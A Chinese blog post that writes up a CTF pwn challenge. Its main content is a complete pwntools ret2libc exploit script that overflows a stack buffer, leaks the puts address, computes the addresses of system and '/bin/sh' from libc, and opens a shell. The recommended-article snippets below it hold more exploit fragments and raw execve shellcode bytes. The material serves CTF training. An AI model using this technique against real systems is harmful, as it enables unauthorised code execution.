pwn1

最新推荐文章于 2023-10-03 11:19:58 发布
最新推荐文章于 2023-10-03 11:19:58 发布
阅读量960 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014281987/article/details/52337610
版权

坑:记住是/bin/sh,不是bin/sh啊啊啊

这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用

from pwn import *

io=process("./2419")  //题目为xman ctf训练营
puts_got=0x0804A01C
puts_plt=0x08048490
finger=0x08048765


libc = ELF('./libc-2.19.so')
def readuntil(delim):
    data=io.recvuntil(delim);
    return data;
print readuntil('\n')
payload1 = ''
payload1 += 'campmates'
payload1 += 'A' * 81+ 'good'
print payload1
io.sendline(payload1)
readuntil('cloth')
readuntil('\n')

payload2="A"*25+p32(puts_plt)+p32(finger)+p32(puts_got)
#print payload2
io.sendline(payload2)
p=readuntil('\n')
print "plt:"+p
puts_addr=u32(p[4:8])
print hex(puts_addr)
system_addr=puts_addr-libc.symbols['puts']+ libc.symbols['system']
print hex(system_addr)
bin_addr=puts_addr-libc.symbols['puts']+ list(libc.search('/bin/sh'))[0]
print hex(bin_addr)
print readuntil('cloth')
readuntil('\n')
payload3="A"*25+p32(system_addr)+p32(finger)+p32(bin_addr)
io.sendline(payload3)
#print readuntil('\n')
io.interactive()
lulu_ctf
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
攻防世界 pwn1
10-25 959
1 题目 2 分析 流程很简单,提供三个功能,store print quit。store功能存在明显的溢出点: 接下来就是利用溢出点,将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来,然后溢出one_gadget.exp如下: from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.
pwn1(xctf)
weixin_43868725的博客
08-08 477
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
pwn1 一道pwn练习题
05-07
pwn练习题
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
《网络与系统攻防技术》实验一:pwn1文件反汇编
最新发布
03-29
《网络与系统攻防技术》实验一:pwn1文件反汇编
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
xctf pwn1
qq_41071646的博客
05-14 941
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
pwn点云文件
07-06
打开是一个怪兽的点云文件,在需要使用pwn文件时方便使用
PWN1|WP
l2645470582_的博客
04-11 625
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
习题--pwn1
m0_49959202的博客
09-18 133
文章目录pwn11.程序分析2.栈帧设计3.exp编写 pwn1 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现栈段可以执行: ida分析,main函数内部调用了vulnerable_function(),可以用来栈溢出: 同时发现上面的printh可以用来泄露buf的地址,因此可以将shellcode填上buf处,然后根据泄露的地址再跳回来执行shellcode 程序一下,可以查看到泄露的buf地址: gdb调试发现需要淹没的长度为:0xffffd2d8−0xfff
CTFshow PWN1
qq_60737948的博客
10-03 124
pwn开始的地方
攻防世界pwn——pwn1
qq_62076255的博客
12-21 421
做题记录
pwn1第一关
qq_18823653的博客
03-28 454
检查程序,发现是32位,开了NX保护 拖入ida32 get()存在溢出,gdb调试 偏移112字节后覆盖返回地址,程序本身有调用system函数, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive(...
攻防世界--pwn1
qq_73149934的博客
02-22 472
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界 -pwn1
TedLau的博客
04-22 889
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
Pwn_1 快速入门 bluewhale
weixin_30323961的博客
02-02 176
装东西 sudo apt-get install nasm,gcc,gdb,binuntils,hexedit sudo apt-get install libc6-dev-i386 pip install pwntools Qira使用 chmod 777 ./pwn1 qira -s ./pwn1 动态分析 GDB 基本命令 run disas function na...
Mac m1配置pwn
09-02
- *1* *3* [在Apple Silicon(M1)上搭建pwn解题环境](https://blog.csdn.net/qq_25755011/article/details/115541221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值